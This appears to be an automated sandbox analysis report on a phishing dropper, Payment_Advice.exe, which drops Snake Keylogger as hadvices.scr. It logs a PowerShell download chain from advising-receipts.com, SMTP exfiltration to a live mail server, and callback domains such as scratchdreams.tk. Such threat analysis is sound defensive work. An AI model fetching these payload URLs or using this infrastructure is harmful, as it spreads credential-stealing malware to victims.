            Source: C:\Windows\Temp\hadvices.scrJoe Sandbox ML: detected
            Source: Payment_Advice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49724 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.67.141.195:443 -> 192.168.2.7:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.7:49740 version: TLS 1.2
            Source: Payment_Advice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: Payment_Advice.exe, 00000000.00000002.1199149404.00000000057B0000.00000004.08000000.00040000.00000000.sdmp, Payment_Advice.exe, 00000000.00000002.1198385946.0000000003011000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000017.00000002.1414670213.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \/.dll.pdb source: Payment_Advice.exe, hadvices.scr.4.dr
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user\AppData\Local\Temp\9D53.tmpJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmpJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user~1\Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.tmpJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user~1\AppData\Jump to behavior

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\Temp\hadvices.scrCode function: 4x nop then lea esp, dword ptr [ebp-08h]25_2_01667550
            Source: C:\Windows\Temp\hadvices.scrCode function: 4x nop then lea esp, dword ptr [ebp-08h]25_2_0166793B
            Source: C:\Windows\Temp\hadvices.scrCode function: 4x nop then lea esp, dword ptr [ebp-08h]25_2_01667939
            Source: C:\Windows\Temp\hadvices.scrCode function: 4x nop then lea esp, dword ptr [ebp-08h]25_2_016680B3
            Source: C:\Windows\Temp\hadvices.scrCode function: 4x nop then lea esp, dword ptr [ebp-08h]25_2_01667CB2
            Source: C:\Windows\Temp\hadvices.scrCode function: 4x nop then jmp 0177FCD1h25_2_0177FA10
            Source: C:\Windows\Temp\hadvices.scrCode function: 4x nop then jmp 0177EFDDh25_2_0177EDF0
            Source: C:\Windows\Temp\hadvices.scrCode function: 4x nop then jmp 0177F967h25_2_0177EDF0
            Source: C:\Windows\Temp\hadvices.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h25_2_0177E310
            Source: C:\Windows\Temp\hadvices.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h25_2_0177E943
            Source: C:\Windows\Temp\hadvices.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h25_2_0177EB23

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.7:49743 -> 108.167.142.65:587
            Source: TrafficSnort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.7:49744 -> 108.167.142.65:587
            Source: TrafficSnort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.7:49745 -> 108.167.142.65:587
            Source: TrafficSnort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.7:49746 -> 108.167.142.65:587
            Source: TrafficSnort IDS: 2044767 ET TROJAN Snake Keylogger Exfil via SMTP 192.168.2.7:49747 -> 108.167.142.65:587
            Yara detected Generic Downloader
            Source: Yara matchFile source: Payment_Advice.exe, type: SAMPLE
            Source: Yara matchFile source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.Payment_Advice.exe.c30000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.hadvices.scr.990000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: C:\Windows\Temp\hadvices.scr, type: DROPPED
            Source: global trafficTCP traffic: 192.168.2.7:49743 -> 108.167.142.65:587
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 172.67.169.18 172.67.169.18
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: global trafficTCP traffic: 192.168.2.7:49743 -> 108.167.142.65:587
            Source: global trafficHTTP traffic detected: GET /hsbc/Payment_Advice.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: advising-receipts.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /hsbc/hadvices.scr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: advising-receipts.com
            Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49724 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknownTCP traffic detected without corresponding DNS query: 23.56.12.145
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /hsbc/Payment_Advice.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: advising-receipts.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /hsbc/hadvices.scr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: advising-receipts.com
            Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/149.18.24.96 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: advising-receipts.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: scratchdreams.tk
            Source: global trafficDNS traffic detected: DNS query: mail.qoldenfrontier.com
            Source: powershell.exe, 00000004.00000002.1386246749.000001B481ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1386246749.000001B4815DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://advising-receipts.com
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000032CA000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000031F3000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003245000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: hadvices.scr, 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: hadvices.scr, 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: svchost.exe, 00000008.00000002.2455799913.000001E16CC00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: Payment_Advice.exe, 00000000.00000002.1196271509.000000000124D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
            Source: hadvices.scr, 00000019.00000002.2455454438.000000000345C000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003448000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.000000000343E000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003430000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003452000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.qoldenfrontier.com
            Source: powershell.exe, 00000004.00000002.1456507128.000001B490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.000000000321A000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480001000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: hadvices.scr, 00000019.00000002.2455454438.0000000003306000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1386246749.000001B481761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://advising-receipts.com
            Source: powershell.exe, 00000004.00000002.1460184360.000001B4E79D7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1461548989.000001B4E7D40000.00000004.00000020.00020000.00000000.sdmp, 9D55.vbs.2.drString found in binary or memory: https://advising-receipts.com/hsbc/Payment_Advice.pdf
            Source: powershell.exe, 00000004.00000002.1460184360.000001B4E79D7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1386246749.000001B481761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1461548989.000001B4E7D40000.00000004.00000020.00020000.00000000.sdmp, 9D55.vbs.2.drString found in binary or memory: https://advising-receipts.com/hsbc/hadvices.scr
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
            Source: svchost.exe, 00000008.00000003.1274341677.000001E16CA80000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000004.00000002.1386246749.000001B480C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000004.00000002.1456507128.000001B490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: qmgr.db.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003245000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: hadvices.scr, 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003202000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.96
            Source: hadvices.scr, 00000019.00000002.2455454438.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003245000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003294000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032A2000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.96$
            Source: hadvices.scr, 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2455454438.0000000003306000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
            Source: hadvices.scr, 00000019.00000002.2455454438.0000000003306000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
            Source: ReaderMessages.6.drString found in binary or memory: https://www.adobe.co
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 172.67.141.195:443 -> 192.168.2.7:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.169.18:443 -> 192.168.2.7:49740 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 23.2.hadvices.scr.3e03d90.4.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.5590000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.404e590.3.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.31018e4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.31018e4.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.Payment_Advice.exe.404e590.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
